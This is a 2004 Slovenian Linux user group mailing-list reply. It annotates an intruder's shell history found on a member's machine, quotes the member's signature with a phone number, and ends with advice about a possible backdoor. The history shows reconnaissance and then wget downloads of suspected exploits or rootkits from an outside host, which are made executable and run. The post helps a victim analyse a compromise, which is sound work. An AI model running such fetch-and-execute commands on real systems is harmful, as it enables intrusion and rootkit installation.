[LUGOS] wget
vojko kočevnik
tehnicnapomoc at email.si
Tue Feb 10 12:17:53 CET 2004
Tko na hitro bi lahko skoraj zagotovo rekel da si je pobral iz strani
http://freeweb.siol.net/stuclb99/x kaksen exploit oz rootkit ter ga zagnal na
tvoji masini....CE imas ti sreco & in je on neumen se lahko na siolu potozis na
uporabnika "stuclb99" ker sklepam da si je tale lammer pobral exploite kar iz
svojega ftp-ja...
No zdej pa se tocno kaj je pocel :
> > w ( w ukaz pove kdo je trenutno logan v sistem man w)
> > uname -a (pogledal je za kaksno masino gre OS etc...)
> > cd /tmp ( no comment ;)
> > ls
> > cat /etc/*rel*
> > wget freeweb.siol.net/stuclb99/d (pobral exploite oz rootkite)
> > chmod +x d ( exploit (rootikt) "dal" v exegutable obliko
> > ./d (exploit (rootkit) je zagnal )
> > wget freeweb.siol.net/stuclb99/x
> > chmod +x x
> > ./x
> ./x
NASVET: Mozno da je to tudi kasen backdoor tko da dokler se zadeva ne uredi raje
ne uporabljaj linuxa v multiuser moodu (moj nasvet...)
Veliko srece ! ;)
> Lep pozdrav, Tadej
> --------------------------------------------------
> E-mail: tadej at sobotainfo.com
> IRCNET: Kiri_ (#ms, #lugos...)
> GSM: +386 31 380836
> --------------------------------------------------
____________________
http://www.email.si/
More information about the lugos-list
mailing list